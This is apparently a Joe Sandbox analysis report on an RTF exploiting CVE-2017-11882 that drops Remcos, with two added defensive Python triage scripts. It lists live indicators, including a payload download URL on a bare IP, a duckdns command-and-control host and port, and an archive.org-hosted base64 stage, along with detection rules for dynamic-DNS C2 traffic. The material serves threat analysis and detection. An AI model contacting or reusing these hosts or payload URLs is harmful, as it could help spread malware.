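The three contacted hosts above describe the whole post-exploitation network pattern: a stage download by bare IP (185.29.10.52), a dynamic-DNS C2 name (authurremc.duckdns.org, the only host flagged malicious) resolving to 192.210.150.29 and contacted on port 14645, and the geoplugin.net/json.gp geolocation lookup the graph attributes to RegAsm.exe. The Python below is an added example of turning that pattern into network-log triage; it is not part of the report. The log lines are constructed and loosely modelled on Suricata EVE JSON with simplified field names; 10.0.0.5, 10.0.0.7 and 203.0.113.10 are made-up addresses, the dynamic-DNS suffix list is the author's own short list, and the rule names are not the report's signature names.

```python
"""Network triage for the report's C2 pattern over constructed EVE-style JSON lines.

Added example, not report output. Field names are a simplified Suricata EVE layout.
"""
import ipaddress
import json
from collections import defaultdict

# Dynamic-DNS providers (author's short list); the report's C2 lives under duckdns.org.
DYNDNS_SUFFIXES = ("duckdns.org", "no-ip.org", "ddns.net", "hopto.org")
# Geolocation lookup the graph shows RegAsm.exe performing after the C2 connection.
GEOIP_BEACONS = {("geoplugin.net", "/json.gp")}

# Constructed sample log. The indicators on 10.0.0.5 are the report's; 10.0.0.5, 10.0.0.7
# and the 203.0.113.10 answer for www.msn.com are made up for the benign control.
SAMPLE_LOG = """\
{"event_type":"http","src_ip":"10.0.0.5","dest_ip":"185.29.10.52","dest_port":80,"http":{"hostname":"185.29.10.52","url":"/550/makepicturewithgreatthingstobeonline.tIF","http_method":"GET"}}
{"event_type":"dns","src_ip":"10.0.0.5","dns":{"type":"answer","rrname":"ia600100.us.archive.org","rdata":"207.241.227.240"}}
{"event_type":"dns","src_ip":"10.0.0.5","dns":{"type":"answer","rrname":"authurremc.duckdns.org","rdata":"192.210.150.29"}}
{"event_type":"flow","src_ip":"10.0.0.5","dest_ip":"192.210.150.29","dest_port":14645,"proto":"TCP"}
{"event_type":"http","src_ip":"10.0.0.5","dest_ip":"178.237.33.50","dest_port":80,"http":{"hostname":"geoplugin.net","url":"/json.gp","http_method":"GET"}}
{"event_type":"dns","src_ip":"10.0.0.7","dns":{"type":"answer","rrname":"www.msn.com","rdata":"203.0.113.10"}}
{"event_type":"http","src_ip":"10.0.0.7","dest_ip":"203.0.113.10","dest_port":80,"http":{"hostname":"www.msn.com","url":"/","http_method":"GET"}}
"""


def parse_eve(text: str):
    """One JSON object per non-empty line."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def is_dyndns(name: str) -> bool:
    """True for a dynamic-DNS provider domain or any name under one."""
    name = name.lower().rstrip(".")
    return any(name == s or name.endswith("." + s) for s in DYNDNS_SUFFIXES)


def triage(records):
    """Return [(rule, src_ip, detail)] in log order.

    DNS answers for dynamic-DNS names are remembered per source host so that a later
    flow to the answered IP on a non-web port can be tied back to the name.
    """
    findings = []
    resolved = defaultdict(dict)  # src_ip -> {answer_ip: dyn-DNS name}
    for r in records:
        kind, src = r.get("event_type"), r.get("src_ip")
        if kind == "dns" and r["dns"].get("type") == "answer":
            name, rdata = r["dns"]["rrname"], r["dns"].get("rdata")
            if is_dyndns(name):
                findings.append(("dynamic_dns_resolution", src, name))
                if rdata:
                    resolved[src][rdata] = name
        elif kind == "http":
            host, url = r["http"].get("hostname", ""), r["http"].get("url", "")
            if is_ip_literal(host):  # payload staging by bare IP, no hostname at all
                findings.append(("http_to_bare_ip", src, f"http://{host}{url}"))
            if (host.lower(), url) in GEOIP_BEACONS:
                findings.append(("geoip_beacon", src, host + url))
        elif kind == "flow":
            dst, port = r.get("dest_ip"), r.get("dest_port")
            name = resolved[src].get(dst)
            if name and port not in (80, 443):
                findings.append(("c2_flow_to_dyndns_host", src, f"{name} ({dst}:{port})"))
    return findings


if __name__ == "__main__":
    for rule, src, detail in triage(parse_eve(SAMPLE_LOG)):
        print(f"{rule:26} {src:10} {detail}")
```

The dyn-DNS rule on its own is noisy in many environments; the correlation with a subsequent flow on an unusual port (14645 here) is what lifts it to a C2 finding, and the geoplugin.net lookup immediately afterwards is a cheap secondary confirmation for this family. The benign 10.0.0.7 host produces nothing.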
Name | Source | Malicious | Antivirus Detection | Reputation
http://b.scorecardresearch.com/beacon.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://acdn.adnxs.com/ast/ast.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.comr | RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net03 | powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/License | powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://support.google.com/chrome/?p=plugin_flash | RegAsm.exe, 00000014.00000002.652320409.0000000000BD8000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net | RegAsm.exe, 00000014.00000002.646323313.00000000002B4000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://deff.nelreports.net/api/report?cat=msn | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.netP | RegAsm.exe, 0000000D.00000002.396938042.00000000003F3000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://go.micros | powershell.exe, 00000008.00000002.382702035.0000000002DF5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.com/qK | RegAsm.exe, 00000017.00000002.645240047.000000000032C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://cache.btrll.com/default/Pix-1x1.gif | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://www.google.com | RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://geoplugin.net/json.gp/C | powershell.exe, 00000008.00000002.383266190.0000000003889000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000009.00000002.884353898.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFj | EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://o.aolcdn.com/ads/adswrappermsni.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/?ocid=iehp | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://contoso.com/ | powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://static.chartbeat.com/js/chartbeat.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/de-de/?ocid=iehp | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://ia600100.us.archive.org | powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://login.yahoo.com/config/login | RegAsm.exe | false | Avira URL Cloud: safe | unknown
http://www.nirsoft.net/ | RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://ocsp.entrust.net0D | powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000006.00000002.386327941.000000000269C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.382702035.0000000002641000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.ccleaner.com/go/app_cc_pro_trialkey | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://crl.entrust.net/server1.crl0 | powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4 | EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/8/nrrV73987.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com | RegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.394160239.0000000000AC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000017.00000002.645253852.0000000000459000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.383266190.0000000003669000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://185.29.10.52 | powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFsC: | EQNEDT32.EXE, 00000002.00000003.360658703.00000000005AA000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txtVUF;HqRbase64Content | powershell.exe, 00000008.00000002.382702035.0000000002779000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/ | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.msn.com/ | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au | bhvB683.tmp.13.dr | false | Avira URL Cloud: safe | unknown
http://www.imvu.com/GK | RegAsm.exe, 0000000F.00000002.392868130.000000000037C000.00000004.00000010.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | bhv83A1.tmp.20.dr, bhvB683.tmp.13.dr | false
                        • Avira URL Cloud: safe
                        unknown
                        http://cdn.at.atwola.com/_media/uac/msn.htmlbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://www.google.com/accounts/serviceloginRegAsm.exefalse
                        • Avira URL Cloud: safe
                        unknown
                        http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fsetbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://secure.comodo.com/CPS0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown
                        https://policies.yahoo.com/w3c/p3p.xmlbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://crl.entrust.net/2048ca.crl0powershell.exe, 00000008.00000002.385013068.0000000004D04000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.msn.com/advertisement.ad.jsbhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
                        • Avira URL Cloud: safe
                        unknown
                        http://www.ebuddy.comRegAsm.exe, RegAsm.exe, 0000000F.00000002.393211498.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        unknown

Legend (share of IPs): No. of IPs < 25% | 25% < No. of IPs < 50% | 50% < No. of IPs < 75% | 75% < No. of IPs

IP | Domain | Country | ASN | ASN Name | Malicious
185.29.10.52 | unknown | European Union | 60567 | DATACLUB-SE | true
192.210.150.29 | authurremc.duckdns.org | United States | 36352 | AS-COLOCROSSINGUS | true
178.237.33.50 | geoplugin.net | Netherlands | 8455 | ATOM86-ASATOM86NL | false
207.241.227.240 | ia600100.us.archive.org | United States | 7941 | INTERNET-ARCHIVEUS | false
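Note what the two tables above say about the same host: the payload download URL on 185.29.10.52 (fetched by EQNEDT32.EXE) carries Malicious = false and an Avira "safe" verdict in the URL table, while the IP table flags 185.29.10.52 as malicious. Triaging from the URL table alone would miss the stage-two download. The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the flattened record shapes used in this report (three lines per URL record, three lines per IP row, with the columns run together) and flags every URL whose host is a malicious IP or a domain that resolved to one. The process names used to split the URL from its Source column (SOURCE_TOKEN) and the COUNTRIES tuple are assumptions read off this report; the sample rows are copied from the tables above.

```python
"""Network IOCs from a flattened Joe Sandbox report, cross-checked against
its IP/ASN table. Added example, not Joe Sandbox code. Record shapes are the
ones in this report: a URL record is three lines (name+source+malicious,
'• <engine>: <verdict>', reputation); an IP row is three lines (ip,
domain+country, asn+asn-name+malicious). SOURCE_TOKEN and COUNTRIES are
assumptions read off this report; extend them for other reports."""
import re
from dataclasses import dataclass
from urllib.parse import urlsplit

# Strings that begin the Source column here (process names, bhv*.tmp cache files).
SOURCE_TOKEN = r"bhv[0-9A-F]{4}\.tmp\.\d+\.dr|powershell\.exe|RegAsm\.exe|EQNEDT32\.EXE"
URL_ROW = re.compile(r"^(?P<url>https?://\S*?)(?P<source>(?:" + SOURCE_TOKEN
                     + r").*?)(?P<mal>true|false)$")
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
COUNTRIES = ("European Union", "United States", "Netherlands")  # as seen above
DOMAIN_ROW = re.compile(r"^(?P<domain>.+?)(?P<country>"
                        + "|".join(map(re.escape, COUNTRIES)) + r")$")
ASN_ROW = re.compile(r"^(?P<asn>\d+)(?P<name>.+?)(?P<mal>true|false)$")


@dataclass
class UrlIoc:
    url: str
    sources: list            # processes / memory dumps / dropped files it was seen in
    flagged_malicious: bool  # the URL table's own Malicious column
    av_verdict: str
    reputation: str


@dataclass
class IpIoc:
    ip: str
    domain: str
    country: str
    asn: int
    asn_name: str
    malicious: bool


def parse_url_table(lines):
    """Three-line URL records; lines that do not start a record are skipped."""
    out, i = [], 0
    while i < len(lines):
        m = URL_ROW.match(lines[i].strip())
        if not m:
            i += 1
            continue
        verdict = lines[i + 1].strip().lstrip("• ") if i + 1 < len(lines) else ""
        reputation = lines[i + 2].strip() if i + 2 < len(lines) else ""
        out.append(UrlIoc(m["url"], [s.strip() for s in m["source"].split(",")],
                          m["mal"] == "true", verdict, reputation))
        i += 3
    return out


def parse_ip_table(lines):
    """Three-line IP rows; the header line and anything else is skipped."""
    out, i = [], 0
    while i + 2 < len(lines):
        ip = lines[i].strip()
        d = DOMAIN_ROW.match(lines[i + 1].strip())
        a = ASN_ROW.match(lines[i + 2].strip())
        if IPV4.match(ip) and d and a:
            out.append(IpIoc(ip, d["domain"], d["country"], int(a["asn"]),
                             a["name"], a["mal"] == "true"))
            i += 3
        else:
            i += 1
    return out


def correlate(urls, ips):
    """URLs whose host is a malicious IP, or a domain that resolved to one,
    whatever the URL table's own Malicious column says."""
    bad = {x.ip for x in ips if x.malicious}
    bad |= {x.domain for x in ips if x.malicious and x.domain != "unknown"}
    return [u for u in urls if urlsplit(u.url).hostname in bad]


# Rows copied from the report's tables (a subset).
URL_LINES = """\
http://185.29.10.52/550/makepicturewithgreatthingstobeonline.tIFAs4EQNEDT32.EXE, 00000002.00000002.361213045.000000000054F000.00000004.00000020.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
http://185.29.10.52powershell.exe, 00000008.00000002.382702035.00000000028E5000.00000004.00000800.00020000.00000000.sdmpfalse
• Avira URL Cloud: safe
unknown
https://contextual.media.net/bhv83A1.tmp.20.dr, bhvB683.tmp.13.drfalse
• Avira URL Cloud: safe
unknown
""".splitlines()
IP_LINES = """\
IPDomainCountryFlagASNASN NameMalicious
185.29.10.52
unknownEuropean Union
60567DATACLUB-SEtrue
192.210.150.29
authurremc.duckdns.orgUnited States
36352AS-COLOCROSSINGUStrue
178.237.33.50
geoplugin.netNetherlands
8455ATOM86-ASATOM86NLfalse
""".splitlines()

if __name__ == "__main__":
    for u in correlate(parse_url_table(URL_LINES), parse_ip_table(IP_LINES)):
        print(f"{u.url}  (URL table: malicious={u.flagged_malicious}; {u.av_verdict})")
```

Run against the rows above it reports both 185.29.10.52 URLs, each still carrying the URL table's own malicious=False and "Avira URL Cloud: safe", and ignores the contextual.media.net browser-cache noise. The split between URL and Source relies on no URL containing one of the SOURCE_TOKEN strings, which holds for this report but should be re-checked when the token list is extended.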

Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1519296
Start date and time: 2024-09-26 10:32:07 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 23s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsofficecookbook.jbs
Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of new started processes analysed: 25
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf
Detection: MAL
Classification: mal100.rans.phis.troj.spyw.expl.evad.winRTF@29/20@3/4
EGA Information:
• Successful, ratio: 71.4%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 179
• Number of non-executed functions: 317
Cookbook Comments:
• Found application associated with file extension: .rtf
• Found Word or Excel or PowerPoint or XPS Viewer
• Attach to Office via COM
• Active ActiveX Object
• Scroll down
• Close Viewer
• Override analysis time to 79586.0484168577 for current running targets taking high CPU consumption
• Override analysis time to 159172.096833715 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, conhost.exe, svchost.exe
• Execution Graph export aborted for target EQNEDT32.EXE, PID 3352 because there are no executed functions
• Execution Graph export aborted for target powershell.exe, PID 3568 because it is empty
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Report size getting too big, too many NtReadVirtualMemory calls found.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: SecuriteInfo.com.Exploit.CVE-2017-11882.123.31177.14968.rtf

Time | Type | Description
04:32:59 | API Interceptor | 293x Sleep call for process: EQNEDT32.EXE modified
04:33:03 | API Interceptor | 13x Sleep call for process: wscript.exe modified
04:33:04 | API Interceptor | 107x Sleep call for process: powershell.exe modified
04:33:13 | API Interceptor | 5703531x Sleep call for process: RegAsm.exe modified

Match | Associated Sample Name / URL | Detection | Threat Name | Context
185.29.10.52 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 185.29.10.52/55/AUNCC.txt
185.29.10.52 | SPEC.xls | malicious | Remcos, PureLog Stealer | 185.29.10.52/55/AUNCC.txt
192.210.150.29 | 1561073.xls | malicious | Unknown | 192.210.150.29/xampp/ebm/flowersandlionsbothgreatattitudeimage.bmp
192.210.150.29 | Invoices.xls | malicious | FormBook, GuLoader | 192.210.150.29/6050/IGCC.exe
178.237.33.50 | 6122.scr.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | 6122.scr.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | file.exe | malicious | Remcos | geoplugin.net/json.gp
178.237.33.50 | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | geoplugin.net/json.gp
178.237.33.50 | BL.xls | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | geoplugin.net/json.gp
178.237.33.50 | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | geoplugin.net/json.gp
178.237.33.50 | 1DUCJGrpyb.exe | malicious | Remcos | geoplugin.net/json.gp

Match | Associated Sample Name / URL | Detection | Threat Name | Context
authurremc.duckdns.org | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 192.210.150.29
authurremc.duckdns.org | SPEC.xls | malicious | Remcos, PureLog Stealer | 192.210.150.29
authurremc.duckdns.org | 17271612591ab6f17ada184393f4f649df7ae1e0875e1ed7c7f90b08ae9f86559128c060fa548.dat-decoded.exe | malicious | Remcos | 192.210.150.29
geoplugin.net | 6122.scr.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | 6122.scr.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | SecuriteInfo.com.Win32.PWSX-gen.9317.6656.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | Marys Organizer 2023 Release.zip | malicious | Remcos | 178.237.33.50
geoplugin.net | https://maveuve.github.io/frlpodf/marynewreleasefax.html | malicious | Remcos | 178.237.33.50
geoplugin.net | file.exe | malicious | Remcos | 178.237.33.50
geoplugin.net | SDWLLRJcsY.exe | malicious | Remcos, GuLoader | 178.237.33.50
geoplugin.net | BL.xls | malicious | Remcos, PureLog Stealer | 178.237.33.50
geoplugin.net | z65orderrequest.bat.exe | malicious | GuLoader, Remcos | 178.237.33.50
geoplugin.net | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 178.237.33.50
ia600100.us.archive.org | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
ia600100.us.archive.org | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | 1zbL83sqmd.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | AWS 1301241710.docx.doc | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | Order draft.vbs | malicious | Azorult, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | SPEC.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
ia600100.us.archive.org | US0914424A.xla.xlsx | malicious | Remcos, PureLog Stealer | 207.241.227.240

Match | Associated Sample Name / URL | Detection | Threat Name | Context
DATACLUB-SE | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 185.29.10.52
DATACLUB-SE | SPEC.xls | malicious | Remcos, PureLog Stealer | 185.29.10.52
DATACLUB-SE | tMkxadpE7f.vbs | malicious | Remcos | 109.248.144.231
DATACLUB-SE | Pt Mills Request.exe | malicious | XWorm | 109.248.144.181
DATACLUB-SE | NySTAwCpzK.rtf | malicious | Remcos | 109.248.144.173
DATACLUB-SE | Scan document.xls | malicious | Unknown | 109.248.144.173
DATACLUB-SE | Purchase order.xls | malicious | Remcos | 109.248.144.173
DATACLUB-SE | createdgoodthingswtihmewhilealot.gif.vbs | malicious | Unknown | 185.29.9.32
DATACLUB-SE | erthings.doc | malicious | Unknown | 185.29.9.32
DATACLUB-SE | Scan copy.xls | malicious | Unknown | 185.29.9.32
INTERNET-ARCHIVEUS | http://www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | malicious | Unknown | 207.241.237.3
INTERNET-ARCHIVEUS | LJ1IZDkHyE.hta | malicious | Cobalt Strike, Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | hnvc.vbs | malicious | PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | wm.vbs | malicious | PureLog Stealer, XWorm | 207.241.227.240
INTERNET-ARCHIVEUS | TM3utH2CsU.exe | malicious | PureLog Stealer, XWorm | 207.241.227.240
INTERNET-ARCHIVEUS | BL.xls | malicious | Remcos, PureLog Stealer | 207.241.227.240
INTERNET-ARCHIVEUS | Fwo62RjOqH.rtf | malicious | Remcos, PureLog Stealer | 207.241.227.240
